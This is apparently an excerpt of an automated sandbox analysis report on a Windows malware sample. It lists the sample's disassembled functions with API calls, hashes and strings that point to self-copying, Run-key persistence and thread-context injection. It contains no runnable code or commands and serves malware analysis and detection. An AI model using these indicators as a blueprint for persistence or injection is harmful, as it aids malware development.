                                                                                        • Instruction Fuzzy Hash: 44E09276918F8082C620AB15F88011AB7B4F7C8B94F904125EACD42B3CDF3CC265CB00
                                                                                        Function 00007FF795D12B44 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 086008f540e24605ddfc47095f60edbd8a2cf42a36c31bf1750eee146be0699d
                                                                                        • Instruction ID: 16b7ec96892efe7272875c973829a3a261af287fe7aa4c73251760014c514ace
                                                                                        • Opcode Fuzzy Hash: 086008f540e24605ddfc47095f60edbd8a2cf42a36c31bf1750eee146be0699d
                                                                                        • Instruction Fuzzy Hash: 7F01E272508BC586E360DF61F59835BF7A0F385799F605129E6C942EA8DBBDC088CF40
                                                                                        Function 00007FF795D30844 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00007FF795D31174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF795D311AB
                                                                                          • Part of subcall function 00007FF795D31174: GetVolumeInformationW.KERNELBASE ref: 00007FF795D3124C
                                                                                          • Part of subcall function 00007FF795D31174: wsprintfW.USER32 ref: 00007FF795D312DB
                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D3088D
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308A2
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308B5
                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308C5
                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308D8
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308ED
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D30900
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D30915
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: b1dceeeed50ca16b1b5bae2ebd3da7a5316590a1230e952780a438898449bef1
                                                                                        • Instruction ID: 17fcfe3c6d55be77988ec5a725852c5ea7528db38da1cbcf648b5a5caff9d87c
                                                                                        • Opcode Fuzzy Hash: b1dceeeed50ca16b1b5bae2ebd3da7a5316590a1230e952780a438898449bef1
                                                                                        • Instruction Fuzzy Hash: F0112721618A9685EB70EB35F89476AE361FBC4F45F806032D64E43A6DDE3CD505C710
                                                                                        Function 00007FF795D12058 Relevance: 13.6, APIs: 9, Instructions: 65fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$File$CreateMappingView
                                                                                        • String ID:
                                                                                        • API String ID: 1771758222-0
                                                                                        • Opcode ID: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction ID: b1d97450cfa1851dbc68c866243e499796fa9ff67a3227df5477c7295fc647ac
                                                                                        • Opcode Fuzzy Hash: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction Fuzzy Hash: CC31DC25618A9182EB64EB35F89472EA7A0FBC4F94F506131EB8E43B68DF3DD445CB10
                                                                                        Function 00007FF795D30798 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00007FF795D31174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF795D311AB
                                                                                          • Part of subcall function 00007FF795D31174: GetVolumeInformationW.KERNELBASE ref: 00007FF795D3124C
                                                                                          • Part of subcall function 00007FF795D31174: wsprintfW.USER32 ref: 00007FF795D312DB
                                                                                          • Part of subcall function 00007FF795D30844: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D3088D
                                                                                          • Part of subcall function 00007FF795D30844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308A2
                                                                                          • Part of subcall function 00007FF795D30844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308B5
                                                                                          • Part of subcall function 00007FF795D30844: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308C5
                                                                                          • Part of subcall function 00007FF795D30844: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308D8
                                                                                          • Part of subcall function 00007FF795D30844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D308ED
                                                                                          • Part of subcall function 00007FF795D30844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D30900
                                                                                          • Part of subcall function 00007FF795D30844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D307CD), ref: 00007FF795D30915
                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF795D307DD
                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF795D307E8
                                                                                        • CopyFileW.KERNELBASE ref: 00007FF795D30801
                                                                                        • SetFileAttributesW.KERNELBASE ref: 00007FF795D30819
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                        • String ID: Services
                                                                                        • API String ID: 3209240227-2319745855
                                                                                        • Opcode ID: 357c8228e095cd80062e79d6a05d15ad2197b414554448ed5365f5c815665210
                                                                                        • Instruction ID: 49014bf5b0728f9e9a50fd110a83ae3efbb66719b5e490364861104b11f0d52b
                                                                                        • Opcode Fuzzy Hash: 357c8228e095cd80062e79d6a05d15ad2197b414554448ed5365f5c815665210
                                                                                        • Instruction Fuzzy Hash: 2D012121A1855292EB70EB34E4953AA93A0FF94B44FD06032D74D829A9EE3CD60ACB50
                                                                                        Function 00007FF795D134F0 Relevance: 7.6, APIs: 5, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoad$CreateModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 1423211558-0
                                                                                        • Opcode ID: 8e19fe20eb70262ac2b9ee69aec7594eb78a2744813ecd72a26dbfba2eb32f7d
                                                                                        • Instruction ID: cabaa8c8d56d0a19fa76925cebeaabadc0e518780be47b0a81beb80a2dd5f69b
                                                                                        • Opcode Fuzzy Hash: 8e19fe20eb70262ac2b9ee69aec7594eb78a2744813ecd72a26dbfba2eb32f7d
                                                                                        • Instruction Fuzzy Hash: 2E51182260CA9186E734EB35E4903AFB7A0FB86B84F905035E6CD87A99DF7DD045CB10
                                                                                        Function 00007FF795D31174 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu
                                                                                        • API String ID: 3001812590-640692576
                                                                                        • Opcode ID: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction ID: 09f9b7afa79f85b0d357747fecb424acb6c6c4bf2d70718ba7637ff1d8c074f6
                                                                                        • Opcode Fuzzy Hash: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction Fuzzy Hash: A8414F2261825186E7209B68F49536AF7A0FBC5B08F901136E78D87BA8EF7DD945CB00
                                                                                        Function 00007FF795D12A40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51processstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCreateHandleInternalModuleProcProcesslstrcat
                                                                                        • String ID: -k DcomLaunch -p -s LSM$h
                                                                                        • API String ID: 3850928873-3634226398
                                                                                        • Opcode ID: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction ID: f2429f5229ba190d13f8e3d237b154b5a6e9ccbb1efea19c08ed53513592a8ba
                                                                                        • Opcode Fuzzy Hash: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction Fuzzy Hash: 1D212532608B8282E760CF25F4843AAB7E5F785784F905135E68D43B68EF7DC159CB50
                                                                                        Function 00007FF795D30F48 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                        • API String ID: 779948276-1428018034
                                                                                        • Opcode ID: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction ID: abcedf68cd10d6a06ca4b66531fa94dda57c70a77c0305d427aab986dc384a7c
                                                                                        • Opcode Fuzzy Hash: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction Fuzzy Hash: 44116336518B91C6D7A09F25F48065AB7B0F785BA4F502231FA9E03BA8DF3DD185CB00
                                                                                        Function 00007FF795D12838 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread$Wow64
                                                                                        • String ID:
                                                                                        • API String ID: 275855601-0
                                                                                        • Opcode ID: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction ID: d1a7efdd11ea24e2159863dc553af25262ac5c800180622707aad0f8c7456812
                                                                                        • Opcode Fuzzy Hash: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction Fuzzy Hash: B7315A2260C6C682EB70CB25E48436AA7E1F788B84F809136DA8E83B58DF3CD504CF50
                                                                                        Function 00007FF795D11E8C Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer$SizeWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2087530826-0
                                                                                        • Opcode ID: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction ID: 8a29de22907dc3d592595a13c776a8f6edb2f35f12b8d01d89dadc1a5a844df9
                                                                                        • Opcode Fuzzy Hash: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction Fuzzy Hash: 9111C876A28A9186D760DF79F484A2AB7A1F7C5B40F806135FA8E82A58DF3CD444CB10
                                                                                        Function 00007FF795D12FDC Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionViewwcsnlen
                                                                                        • String ID:
                                                                                        • API String ID: 4106997571-0
                                                                                        • Opcode ID: ffb3091b6b3d5a123d30ae2daab49e37f26347fd6e0e5609431d118b62138c83
                                                                                        • Instruction ID: 2be0b66df24689643a35657279ea69da1899aa7a6d069489026aef3e7c65a9b9
                                                                                        • Opcode Fuzzy Hash: ffb3091b6b3d5a123d30ae2daab49e37f26347fd6e0e5609431d118b62138c83
                                                                                        • Instruction Fuzzy Hash: 90318D2261C79592EB74EB31E4803AAA7E0FB85B84F805131EA8D43B99DF3DD545CB10
                                                                                        Function 00007FF795D11F38 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: e11c399d1a09d423e86982617f7fb185bfad691a7c7991c7f7845112d7df3d18
                                                                                        • Instruction ID: 6c40449ebe2c91f1b7ab347b7a6ba502e2817c2f831ad5cd481fd0bb91577524
                                                                                        • Opcode Fuzzy Hash: e11c399d1a09d423e86982617f7fb185bfad691a7c7991c7f7845112d7df3d18
                                                                                        • Instruction Fuzzy Hash: 9831092250CBD185DA74DB36F48036AA7E4FB86B84F505035EACE83B5ADF3DD4548B10
                                                                                        Function 00007FF795D12174 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 49a6239eca554bde6359bdab4bfc5be76872e352b47871b1d5bcaa8b0cd124c4
                                                                                        • Instruction ID: 8228b20cce9b8047f33642b079f69f1879cb089f8b415716b3884959609ff14a
                                                                                        • Opcode Fuzzy Hash: 49a6239eca554bde6359bdab4bfc5be76872e352b47871b1d5bcaa8b0cd124c4
                                                                                        • Instruction Fuzzy Hash: 6DD01261A39A9181E664EB22F4C031AA2A0FB95B84F406035EB8A02658CF3DC0948B00
                                                                                        Function 00007FF795D302B0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D2FBD9), ref: 00007FF795D302CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: b57c225955378cc017116ab47c09997866f2df82083688e7948c599840e0e8e3
                                                                                        • Instruction ID: 44ebef04fd9f47569629d3ac69366e5c40d9ba5fbcecc0c962a7f1ddeb2c32fc
                                                                                        • Opcode Fuzzy Hash: b57c225955378cc017116ab47c09997866f2df82083688e7948c599840e0e8e3
                                                                                        • Instruction Fuzzy Hash: F6C08071F25190C3D71CDF31F491B0A6A60A744744F905038D70147788CD3DC2528F00
                                                                                        Function 00007FF795D30280 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction ID: 8d2c968507ab0555b06aae86e663de57a25669f264f9eaab89c372620f05adc9
                                                                                        • Opcode Fuzzy Hash: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction Fuzzy Hash: 77D01221E3899281EBA4EB26E8C9719A2E0FFC4B44F849035E68941968CF3CD099CF00

                                                                                        Non-executed Functions

